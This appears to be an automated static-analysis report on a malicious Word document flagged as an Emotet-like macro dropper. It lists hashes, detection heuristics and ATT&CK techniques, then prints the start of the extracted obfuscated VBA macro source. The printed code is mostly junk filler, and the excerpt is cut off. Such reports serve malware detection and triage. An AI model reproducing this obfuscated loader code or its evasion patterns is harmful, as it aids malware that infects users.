Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c9867fab4d5d4cb0…

MALICIOUS

Office (OLE)

Size: 211.5 KB
Created: 2018-04-17 08:53:00
Authoring application: Microsoft Office Word
First seen: 2019-06-27
MD5: a16007284e6f6c827d4268e3d3b8d0bb
SHA-1: c4c27f8d624ef8661a1c732ce120b9c8b266825b
SHA-256: c9867fab4d5d4cb05a809c8adbd59b6627aa4eacf18e8bd913e47e6a07d4d8e6
Risk Score: 262

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment

The file is a malicious Office document containing heavily obfuscated VBA macros. The presence of the 'Obfuscated auto-exec VBA loader' and 'VBA p-code auto-exec with execution tokens' heuristics, together with the ClamAV detection 'Doc.Dropper.Emodldr-6755244-0', strongly indicates dropper functionality. The VBA code appears to be designed to execute a second-stage payload, most likely downloaded from a remote source, although no download URL can be extracted directly from the script excerpt shown below.

Heuristics (7)

  • ClamAV: Doc.Dropper.Emodldr-6755244-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Emodldr-6755244-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URLs:
    • http://ns.adobe.com/xap/1.0/ In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/ In document text (OLE body)
    • http://purl.org/dc/elements/1.1/ In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/ In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent# In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef# In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 56199 bytes
SHA-256: b0a500ef7fd82119a6ecd87fd2c80c7746288c219b66d5a8853b66e42cedcc4e
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub VgGiuC(xeNtdUf As String, EVxAwFL As Boolean)
    RmfdD = Right("nzE]nF$nIZwdh", 4)
    sszfLL = RTrim("&xOWtRZwJ^sqmoDFL !")
    hPzPfVZo = LTrim("fnE[IO?ZRMVmoAg[? @")
    hPzPfVZo = Left("eyaeS XUTeQ[", 5)
    gvssofb = UCase("JOSFCQ!-Ic%w")
    hPzPfVZo = "daacGo?rcBZ*BGtrh" + "YmRcb])QxSxOAB" + "TiWImZP%_unD"
    gvssofb = StrReverse("S#Po(UY)XzSx?ZMc_D")
    MdxWq = 1897 + 963 + 1840
    snNYO = Right("pm_g$tD!W?H.^eeO", 4)
    gvssofb = 714 - 1988 - 864
    RmfdD = "clU@NBYrIH$-xGSeuS#W" + "DvvMOOl$R#g" + "LUk_LXS#LtM"
    EbpGG = "aV)Ln(VhoITpM_?" + "!]no$-kyZO" + "RA*IaFnXVWT"
    gvssofb = Space(1)
    oudyluPl = StrReverse("*F B#xg_TiVZ)aOZZ")
    snNYO = LTrim("qJ(D-]f.Dhgggf#W_?@S")
    oudyluPl = "dwQrqdhy$&E KXx" + "kvdZ-.Tk[K[a" + "Kyjwwr IMm ^Ylc"
    For YdMwhG = 0 To 138
        EbpGG = Right("uDI[!]CUqT", 5)
        sszfLL = ")ucntHesTGaLO#_" + "r_fszFd^jN%lu_OJZ" + "K[r*^w&KxwD]gZHD"
        oudyluPl = RTrim("VB?hex@CpGx H.tM!]fO")
        EbpGG = 1178 + 1274 + 461
    Next YdMwhG

    RmfdD = UCase("T-mprxS n?tvt C#  a")
    oudyluPl = "ssJz)bumjxiZ" + "W%IlHk*fBXYuykoV?" + "!TtudzllbEB@C@GrF"
    For fRGgxg = 0 To 148
        RmfdD = Space(20)
        sszfLL = StrReverse("$eYYY?lfh]tk(%-@")
    Next fRGgxg

    sszfLL = Right("(CpIvr-IqE[", 4)
    EbpGG = UCase("pj.uTwZ@w@uCobM@i")
    sszfLL = UCase("besI%#@TP!.")
    oudyluPl = LTrim("xG!nG W)YJ_lp")
    sszfLL = LTrim("$Akujp]Ql@z b")
    While fIXSTj < 139
        RmfdD = "?J(KAv#$-bc@c #Kr" + "J?hhEYPTT?aTN uZ" + "CRJE&WIeBq%"
        MdxWq = Left("iNpw$)rzG]a-", 2)
        RmfdD = Space(16)
        sszfLL = UCase("nmiIcmRS?Snh#_Yl")
        sszfLL = 770 - 1064 - 1921
        oudyluPl = 1705 + 1586 + 636
        hPzPfVZo = StrReverse("[N]]JRPkl.W]r")
        gvssofb = "Tl(DFq?JQ%Z]sAZnW" + "ePLIZ?q!]NegbTys[" + "ZdQ?TXW-?%eR"
        sszfLL = UCase("kK^! B$SEJOaZGzS")
        fIXSTj = fIXSTj + 1
    Wend

    MdxWq = Left("N#eFCCRasKZ#_O.pt -m", 4)
    While aSkWTF < 178
        MdxWq = 839 - 1086 - 204
        MdxWq = UCase("FkLoaQYMB*[AFmL#p")
        RmfdD = "ABpgC&fHe@D@!]" + "iwK-KQU-(n%$TxU" + "R@&fsGdnczfSz]Ih%ITC"
        RmfdD = Left("LV&GC@mn#v% %!", 5)
        hPzPfVZo = Left("XkTGfMLJf?tw", 5)
        aSkWTF = aSkWTF + 2
    Wend

    snNYO = Right("?W^%HwGweA$LB^ii(", 4)
    hPzPfVZo = UCase("KsdbKhR qTWs@HWIKZ")
    snNYO = Left("*k B!K#Gzd.&?N^##U(u", 4)
    oudyluPl = RTrim("#XV))AgwM$vgrh?vNHOP")
    MdxWq = "uFCvWTU!_h(y?*VkouyF" + "^TQSCAKF.V_inNgJQ.w " + "K[tsrkT_WH YGTS"
    For AqGPWe = 0 To 326
        oudyluPl = LTrim("igEuVwss*IC#bm")
        oudyluPl = UCase("cDV-euv_Iy?I#N")
        snNYO = LTrim("XnVY_&%tkyMKR")
        gvssofb = Space(3)
        hPzPfVZo = 1021 + 743 + 648
        snNYO = " W&swP^Lxwk" + "woZCwMcCEgFBF#HmCC" + "m pDUDuloq^^l&"
        gvssofb = UCase("%[#!G sF_)Y)G_")
        EbpGG = LTrim("(%z)[(yf@b!@.pzhi")
        snNYO = "x@GGLPK%r(_sMI" + "*m*dtftDuEsHuLFkpRr" + "^Ge#F!wIKNs!SR"
    Next AqGPWe

    sszfLL = RTrim("sjGqf[ZuBPUpl-gAU!g")
    EbpGG = Right("r@QJS%zlhSfd", 2)
End Sub

Private Sub WbHIhU(eeeKjd As String, UdWsOi As Integer, zYoQRr As Boolean, PjBYcv As Double)
    EbpGG = 1773 - 1316 - 1069
    oudyluPl = LTrim("R$t%^ JFHuiyE[C$KV")
    While lpUCAn < 282
        hPzPfVZo = UCase("ew^?wc]$xvlB")
        EbpGG = Left("UjCDgx*Ded", 3)
        EbpGG = StrReverse("iiCi%W[!iQ")
        MdxWq = LTrim("qgUwjP.(W-M[")
        MdxWq = 701 - 329 - 606
        lpUCAn = lpUCAn + 3
    Wend

    While RhRoWa < 240
        sszfLL = "T(Za]!xYIts^[.W" + "j^sjyx@&V)-K " + "$HxTX$__ C&PDa!*hbK"
        sszfLL = LTrim("LEBND]bn#H_B")
        snNYO = StrReverse("K?&(SycCtXc%V#&t")
        gvssofb = Space(2)
     
... (truncated)